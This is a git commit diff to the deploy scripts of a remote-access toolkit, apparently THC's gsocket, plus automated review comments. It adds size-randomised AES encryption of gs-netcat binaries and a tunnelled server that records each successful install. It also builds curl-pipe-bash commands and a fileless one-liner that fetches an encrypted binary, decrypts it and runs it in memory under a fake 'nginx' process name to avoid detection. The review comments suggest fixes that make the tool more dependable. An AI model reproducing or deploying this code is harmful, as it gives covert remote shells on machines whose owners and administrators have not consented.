

encrypted deploy
rootTHC committed Dec 12, 2024
1 parent 1baff1d commit db8d211
Showing 2 changed files with 112 additions and 52 deletions.
22 changes: 12 additions & 10 deletions deploy/deploy.sh
Expand Up @@ -97,15 +97,21 @@ IS_DEPLOY_SERVER=
URL_BASE=
DS_GS_HOST=
DS_GS_PORT=
DS_GS_BEACON=
DS_GS_NAME=
DS_GS_BIN=
gs_deploy_webhook=
GS_WEBHOOK_404_OK=
# -----END deploy_server.sh HOOK-----
[[ -n $URL_BASE ]] && [[ -z $GS_URL_BASE ]] && GS_URL_BASE="$URL_BASE"
[[ -n $IS_DEPLOY_SERVER ]] && unset GS_BRANCH
[ -z "$GS_HOST" ] && GS_HOST="$DS_GS_HOST"
[ -z "$GS_PORT" ] && GS_PORT="$DS_GS_PORT"
gs_deploy_webhook=
GS_WEBHOOK_404_OK=
[[ -n $gs_deploy_webhook ]] && GS_WEBHOOK="$gs_deploy_webhook"
unset gs_deploy_webhook
# -----END deploy_server.sh HOOK-----
[ -z "$GS_BEACON" ] && GS_BEACON="$DS_GS_BEACON"
[ -z "$GS_NAME" ] && GS_NAME="$DS_GS_NAME"
[ -z "$GS_BIN" ] && GS_BIN="$DS_GS_BIN"
[ -n "$gs_deploy_webhook" ] && GS_WEBHOOK="$gs_deploy_webhook"
unset gs_deploy_webhook DS_GS_HOST DS_GS_PORT DS_GS_BEACON DS_GS_NAME DS_GS_BIN

[[ -n $GS_URL_BASE ]] && {
URL_BASE_CDN="${GS_URL_BASE}"
Expand Down Expand Up @@ -2290,10 +2296,6 @@ gs_start
echo -e "--> ${CW}Join us - https://thc.org/ops${CN}"

# Default values are known and easily detected by users/admins.
unset is_warn
# [ "$UID" -eq 0 ] && [ -z "$GS_SERVICE" ] && is_warn=1
[ -z "$GS_BIN" ] && is_warn=1
[ -z "$GS_NAME" ] && is_warn=1
[ -n "$is_warn" ] && WARN "Using default names is easily detectable.\n Set ${CB}GS_BIN=<filename>${CN} and ${CDC}GS_NAME=<processname>${CN} instead."
{ [ -z "$GS_BIN" ] || [ -z "$GS_NAME" ]; } && WARN "Using default names is easily detectable.\n Set ${CB}GS_BIN=<filename>${CN} and ${CDC}GS_NAME=<processname>${CN} instead."

exit_code 0
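Review bot: The new default-filling lines `[ -z "$GS_BEACON" ] && GS_BEACON="$DS_GS_BEACON"` (and the `GS_NAME`, `GS_BIN` and `gs_deploy_webhook` lines beneath them) use POSIX `[ … ]`, while the surviving lines just above them (`[[ -n $URL_BASE ]] …`, `[[ -n $IS_DEPLOY_SERVER ]] …`) and the line they replace (`[[ -n $gs_deploy_webhook ]] …`) use `[[ … ]]`; the file is Bash, so `[[ -z $GS_BEACON ]] && GS_BEACON=$DS_GS_BEACON` would keep one test style within the hook block. The block also does not say where the `DS_GS_*` placeholders come from; a one-line comment above the first of them, `# DS_GS_*: filled in by deploy_server.sh via sed; used as defaults when the matching GS_* env var is unset`, would save the next reader a trip to the other file (the sed lines are in this same commit). Whether the hook block sits inside a function is not visible in the hunk.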
142 changes: 100 additions & 42 deletions deploy/deploy_server.sh
Expand Up @@ -12,6 +12,10 @@
# 2. Use your own Global Socket Relay Network
#
# To run this script type:
# export GS_PORT=
# export GS_HOST=
# export GS_BEACON=10
# export GS_NAME=foo
# bash -c "$(curl -fsSL https://gsocket.io/deploy/ys)"
# ---or---
# LOG=results.log bash -c "$(curl -fsSL https://gsocket.io/deploy/ys)"
Expand Down Expand Up @@ -52,6 +56,7 @@ packages+=("openbsd-x86_64")
[[ -t 1 ]] && {
CY="\033[1;33m" # yellow
CDY="\033[0;33m" # yellow
CB="\033[1;34m" # blue
CG="\033[1;32m" # green
CDG="\033[0;32m" # green
CR="\033[1;31m" # red
Expand All @@ -65,8 +70,7 @@ packages+=("openbsd-x86_64")
CF="\e[2m" # faint
}

do_stop()
{
do_stop() {
local arr

[[ -f "cloudflare.pid" ]] && {
Expand All @@ -82,25 +86,28 @@ do_stop()
rm -f "${arr[@]}"
}

do_cleanup()
{
do_cleanup() {
rm -f "cloudflare.log" "www_err.log" &>/dev/null
}

ERREXIT()
{
ERREXIT() {
local code
code=$1
shift 1
[[ -n "$*" ]] && echo -e >&2 "$*"
exit "$code"
}


WARN() {
echo -e "--> ${CY}WARNING: ${CN}$*"
}

do_sigtrap()
{
do_stop
do_cleanup
echo -e "\nType ${CDC}rm -rf ${DATA_DIR_BRANCH}${LOG:+ $LOG}; rmdir ${DATA_DIR}${CN} to clean all files."
echo -e "\nType ${CDC}rm -rf .encpass ${DATA_DIR_BRANCH}${LOG:+ $LOG}; rmdir ${DATA_DIR}${CN} to clean all files."
exit 0
}

Expand Down Expand Up @@ -141,39 +148,70 @@ command -v python >/dev/null || {
}
"$PYTHON" -m http.server -h >/dev/null || ERREXIT 255 "Python -m http.server not found."

unset str
[ -z "$GS_HOST" ] && str+=$'\n'"export GS_HOST=<IPv4>"
[ -z "$GS_NAME" ] && str+=$'\n'"export GS_NAME=<process name>"
[ -z "$GS_BIN" ] && str+=$'\n'"export GS_BIN=<filename>"
[ -n "$str" ] && WARN "Using defaults is easily detectable. Try set:${CDC}${str}${CN}"
unset str

[[ ! -d "${DATA_DIR_BRANCH}/bin" ]] && mkdir -p "${DATA_DIR_BRANCH}/bin"
[[ ! -f "${DATA_DIR_BRANCH}/y" ]] && {
echo -e "Downloading ${CDY}${DEPLOY_SH_NAME}${CN} (e.g. deploy.sh)"
curl -fsSL "https://gsocket.io${URL_BRANCH}/y" --output "${DATA_DIR_BRANCH}/${DEPLOY_SH_NAME}"
}

ENCPASS="$(cat .encpass 2>/dev/null)" || {
ENCPASS="$(head -c 32 < /dev/urandom | base64 | tr -dc '[:alnum:]' | head -c 16)"
[ -n "$ENCPASS" ] && {
IS_NEW_ENCPASS=1
echo "${ENCPASS}" >.encpass
}
}

# Create a temp session password
[ -n "$ENCPASS" ] && [ -z "$GS_SECRET" ] && GS_SECRET="$(head -c 32 < /dev/urandom | base64 | tr -dc '[:alnum:]' | head -c 22)"
for n in "${packages[@]}"; do
[[ -f "${DATA_DIR_BRANCH}/bin/gs-netcat_mini-${n}" ]] && continue
echo -e "Downloading ${CDY}gs-netcat_mini-${n}${CN}..."
curl -fsSL "https://gsocket.io/${BINDIR}/gs-netcat_mini-${n}" --output "${DATA_DIR_BRANCH}/bin/gs-netcat_mini-${n}"
[[ ! -f "${DATA_DIR_BRANCH}/bin/gs-netcat_mini-${n}" ]] && {
echo -e "Downloading ${CDY}gs-netcat_mini-${n}${CN}..."
curl -fsSL "https://gsocket.io/${BINDIR}/gs-netcat_mini-${n}" --output "${DATA_DIR_BRANCH}/bin/gs-netcat_mini-${n}"
}
[ -z "$ENCPASS" ] && continue

fn="${DATA_DIR_BRANCH}/bin/gs-netcat_mini-${n}"
[ -f "${fn}.enc" ] && [ -n "$IS_NEW_ENCPASS" ] && rm -f "${fn}.enc"
[ -f "${fn}.enc" ] && continue
# Increase size by 32*1024 .. 129*1024-1 bytes
(cat "$fn" && dd bs=1 count=$((32000 + 1024 * (RANDOM % 128) + RANDOM % 1024 )) if=/dev/urandom 2>/dev/null) | openssl enc -aes-256-cbc -pbkdf2 -k "$ENCPASS" >"${fn}.enc"
done

start "Cloudflare" "cloudflare.log" cloudflared tunnel --url "http://127.0.0.1:${PORT}" --no-autoupdate
start "www" "www_err.log" "$PYTHON" -m http.server --bind 127.0.0.1 --directory "${DATA_DIR}" "${PORT}"
i=0
while :; do
str=$(grep -E "https://.*trycloudflare.com" cloudflare.log | tail -n1 | cut -f2 -d'|' | sed 's/ //g')
[[ -n $str ]] && break
((i++))
[[ $i -gt 10 ]] && {
[ -n "$GS_URL_BASE" ] && URL_BASE="$GS_URL_BASE"

[ -z "$URL_BASE" ] && {
start "Cloudflare" "cloudflare.log" cloudflared tunnel --url "http://127.0.0.1:${PORT}" --no-autoupdate
start "www" "www_err.log" "$PYTHON" -m http.server --bind 127.0.0.1 --directory "${DATA_DIR}" "${PORT}"
i=0
while :; do
str=$(grep -E "https://.*trycloudflare.com" cloudflare.log | tail -n1 | cut -f2 -d'|' | sed 's/ //g')
[[ -n $str ]] && break
((i++))
[[ $i -gt 10 ]] && {
do_stop
ERREXIT 255 "Could not get cloudflare tunnel. See cloudflare.log for details."
}
sleep 1
done

str="${str:8}" # cut of https://
str="${str//[^[:alnum:]].-}" # sanitize
[[ -z $str ]] && {
do_stop
ERREXIT 255 "Could not get cloudflare tunnel. See cloudflare.log for details."
ERREXIT 255 "Could not get CF URL. See cloudflare.log for details"
}
sleep 1
done

str="${str:8}" # cut of https://
str="${str//[^[:alnum:]].-}" # sanitize
[[ -z $str ]] && {
do_stop
ERREXIT 255 "Could not get CF URL. See cloudflare.log for details"
URL_BASE="https://${str}"
}
URL_BASE="https://${str}"
# URL_BASE='https://gsocket.io'
[ -z "$URL_BASE" ] && ERREXIT 255 "Cant create cloudflare tunnel. Please set ${CDC}URL_BASE='<This Host>'"

# update deploy.sh
sed "s|^URL_BASE=.*|URL_BASE=\"${URL_BASE}\"|" -i "${DATA_DIR_BRANCH}/${DEPLOY_SH_NAME}"
Expand All @@ -182,6 +220,13 @@ sed "s|^gs_deploy_webhook=.*|gs_deploy_webhook='${URL_BASE}/results.php?s=\${GS_
sed 's|^GS_WEBHOOK_404_OK=.*|GS_WEBHOOK_404_OK=1|' -i "${DATA_DIR_BRANCH}/${DEPLOY_SH_NAME}"
[ -n "$GS_HOST" ] && sed 's|^DS_GS_HOST=.*|DS_GS_HOST='"'$GS_HOST'"'|' -i "${DATA_DIR_BRANCH}/${DEPLOY_SH_NAME}"
[ -n "$GS_PORT" ] && sed 's|^DS_GS_PORT=.*|DS_GS_PORT='"'$GS_PORT'"'|' -i "${DATA_DIR_BRANCH}/${DEPLOY_SH_NAME}"
[ -n "$GS_BEACON" ] && sed 's|^DS_GS_BEACON=.*|DS_GS_BEACON='"'$GS_BEACON'"'|' -i "${DATA_DIR_BRANCH}/${DEPLOY_SH_NAME}"
[ -n "$GS_NAME" ] && sed 's|^DS_GS_NAME=.*|DS_GS_NAME='"'$GS_NAME'"'|' -i "${DATA_DIR_BRANCH}/${DEPLOY_SH_NAME}"
[ -n "$GS_BIN" ] && sed 's|^DS_GS_BIN=.*|DS_GS_BIN='"'$GS_BIN'"'|' -i "${DATA_DIR_BRANCH}/${DEPLOY_SH_NAME}"

# memexec string:
MEMCMD="X=\"\$(head -c64</dev/urandom|base64|tr -dc [:alnum:]|head -c22)\" && curl -SskfL \"${URL_BASE:-https://BAD}${URL_BRANCH}/bin/gs-netcat_mini-linux-\$(uname -m).enc?s=\$X\"|openssl enc -d -aes-256-cbc -pbkdf2 -k ${ENCPASS}|GS_NOFFPID=1 GS_ARGS=\"-ilD -s\${X}\"${GS_BEACON:+ GS_BEACON=$GS_BEACON}${GS_HOST:+ GS_HOST=$GS_HOST}${GS_PORT:+ GS_PORT=$GS_PORT} perl '"'-efor(319,279){($f=syscall$_,$",1)>0&&last};open($o,">&=".$f);print$o(<STDIN>);exec{"/proc/$$/fd/$f"}'"${GS_NAME:-nginx}"',@ARGV'"'"
MEMCMD64="$(gzip<<<"${MEMCMD}" | base64 -w0)"

echo -e "${CDG}SUCCESS${CN}"
[ -n "$GS_HOST" ] && echo -e "--> ${CDG}GS_HOST='$GS_HOST'${CN}"
Expand All @@ -190,21 +235,34 @@ echo -e "${CDY}To log via Telegram, Discord or webhook.site please edit
${CW}$(realpath "$(pwd)/${DATA_DIR_BRANCH}/y")${CDY} and set${CN}
1. ${CDC}GS_TG_TOKEN=${CN}, ${CDC}GS_TG_CHATID=${CN} OR ${CDC}GS_DISCORD_KEY=${CN} OR ${CDC}GS_WEBHOOK_KEY=${CN}
To deploy gsocket:
${CM}bash -c \"\$(curl -fsSL ${URL_BASE}${URL_BRANCH}/y)\"${CN}
${CM}bash -c \"\$(wget --no-verbose -O- ${URL_BASE}${URL_BRANCH}/y)\"${CN}
Press CTRL-C to stop
${CDG}-----SUCCESSFUL DEPLOYMENTS ARE SHOWN BELOW-----${CN}"
1. ${CM}bash -c \"\$(curl -fsSL ${URL_BASE}${URL_BRANCH}/y)\"${CN}
2. ${CM}bash -c \"\$(wget --no-verbose -O- ${URL_BASE}${URL_BRANCH}/y)\"${CN}"
echo -e "\
Start gsocket in memory only, without installing - use one of these commands: ${CF}(Linux only)${CN}
1. ${CDM}${MEMCMD};echo \$X${CN}
2. ${CDM}echo '${MEMCMD64}'|base64 -d|gunzip|sh${CN}"

# a dirty hack to retrieve results: The deploy scripts requests an
# non-existing PATH/$SECRET and we retrieve it from the error log.
tail -f www_err.log | while read -r str; do
str="${str//[^[:alnum:] \/:.&=?]/}" # sanitize
str="${str##*GET \/results.php?s=}"
str="${str%% *}"
str="${str//[^[:alnum:]]/}" # sanitize
[[ ${#str} -ne 22 ]] && continue
d="$(date -u)"
echo -e "[${CDG}${d}${CN}] ${CDC}gs-netcat -i -s '${CC}${str}${CDC}'${CN}"
[[ -n $LOG ]] && echo -e "[${d}] gs-netcat -i -s '${str}'" >>"${LOG}"
done

if [ -e www_err.log ]; then
echo -e "Press CTRL-C to stop"
echo -e "${CDG}-----SUCCESSFUL DEPLOYMENTS ARE SHOWN BELOW-----${CN}"
tail -f www_err.log 2>/dev/null | while read -r str; do
str="${str//[^[:alnum:] \/:.&=?]/}" # sanitize
str="${str##*\?s=}"
str="${str%% *}"
str="${str//[^[:alnum:]]/}" # sanitize
[[ ${#str} -ne 22 ]] && continue
d="$(date -u)"
echo -e "[${CDG}${d}${CN}]${CDC}${GS_HOST:+ GS_HOST=$GS_HOST}${GS_PORT:+ GS_PORT=$GS_PORT} gs-netcat -i${GS_BEACON:+w} -s '${CC}${str}${CDC}'${CN}"
[[ -n $LOG ]] && echo -e "[${d}] gs-netcat -i -s '${str}'" >>"${LOG}"
done
else
echo -e "${CDR}Not found: www_err.log${CN}
--> ${CDY}Installs wont get logged. Check if GS_URL_BASE= is set and logs to www_err.log.${CN}"
echo -e "Press CTRL-C to stop"
sleep infinity
fi

do_sigtrap
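Review bot: In the package loop of the hunk starting at `@@ -141,39 +148,70 @@`, the outcome of `curl -fsSL … --output "${DATA_DIR_BRANCH}/bin/gs-netcat_mini-${n}"` is never checked before the encryption step, so when the download fails the pipeline `(cat "$fn" && dd …) | openssl enc … >"${fn}.enc"` still creates `${fn}.enc` (an encryption of empty input), and every later run reaches `[ -f "${fn}.enc" ] && continue` and treats that package as finished. Adding `[ -f "$fn" ] || continue` directly after the `fn=` assignment (or checking curl's exit status) prevents the bogus artifact from being cached; whether `set -e` is active earlier in the file is not visible here, and with `set -e` the script would abort at the failed curl instead. In the same hunk `.encpass` is created with a plain `echo "${ENCPASS}" >.encpass`, which inherits the default umask and is usually world-readable; since it holds the key every `.enc` file depends on, write it as `(umask 077; printf '%s\n' "$ENCPASS" >.encpass)` or `chmod 600 .encpass` right after creating it. Note also that an existing but empty `.encpass` makes `cat` succeed with an empty `ENCPASS`, which silently skips encryption for every package while `MEMCMD` still references the `.enc` files; treating an empty value like a missing file (`[ -n "$ENCPASS" ] || { …generate… }`) would cover that case.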

